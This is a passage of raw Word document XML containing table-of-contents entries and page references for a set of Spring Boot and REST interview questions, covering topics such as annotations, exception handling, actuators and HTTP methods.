              <w:t>776</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1898A704" w14:textId="43A9B8E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7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use of @Service annotation in spring?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308070 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>776</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="334C05CB" w14:textId="671758C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7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use of @Component annotation in spring?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308071 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>777</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0686FF36" w14:textId="0EFFB48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7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use of @Repository annotation in spring?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308072 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>778</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="03F97285" w14:textId="2CCCDDC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7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difference between @Service and @Controller annotation?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308073 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>778</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="13AAF8C3" w14:textId="32CBD3C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7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ComponentScan?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308074 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>779</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="21161D45" w14:textId="4638A73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7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use of @Autowired annotation?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308075 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>779</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="686D9E08" w14:textId="02A38D6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7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rite a REST API to accept user name as input, return the response with message as "Hello, user" and status as "success" and Endpoint - /api/message?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308076 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>780</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="50547B10" w14:textId="4F8A72F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7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handle Exceptions in Spring boot?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308077 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>781</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5401ECB4" w14:textId="254B863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7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provide security to spring boot applications?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308078 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>783</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68E291B3" w14:textId="15ED2CD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7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ControllerAdvice in Spring boot?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308079 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>786</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56FC77D6" w14:textId="20B7ECB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8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retrieve query parameters in Spring boot?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308080 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>787</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E8E3797" w14:textId="083D3F5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8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is the data persisted in DB with the REST API?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308081 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>789</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20F77672" w14:textId="6D20FE3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8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GET and POST methods?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308082 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>791</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5087BE0B" w14:textId="4AC562A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8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rite a SQL or JPQL to retrieve the data from DB?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308083 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>792</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0292828B" w14:textId="50CAF4C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8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will you add Employee object data in the DB using POST call?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308084 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>792</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49A6BA1B" w14:textId="5075F2B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8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size of Spring in your project? Who will decide that?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308085 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>794</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C3E6CB7" w14:textId="362BECA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8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will happen when we replace @Service instead of @Repository?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308086 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>795</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="21DD56DD" w14:textId="285842A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8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uses of SpringBoot application?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308087 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>796</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="435A2078" w14:textId="161AD16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8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is https used in SpringBoot applications?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308088 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>797</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="739C80AB" w14:textId="2322A3F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8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RequestMapping and GetMapping?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308089 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>799</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56012199" w14:textId="15EAADC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9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If you have to create a Spring boot application? What steps will you follow?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308090 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>800</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0472BFA1" w14:textId="5CB5C84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9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are Actuators in spring boot applications?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308091 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>802</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="412E3D2F" w14:textId="046F933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9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are custom exceptions? How do you define your own custom exception?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308092 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>803</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="25EE08AC" w14:textId="78C5DE8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9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ave you worked on Unit testing? Which framework have you used in your project?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308093 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>804</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="37CF64BC" w14:textId="00C734D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9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Lazy Loading and Eager Loading?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308094 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>806</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A584741" w14:textId="349781A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9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PUT and PATCH?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
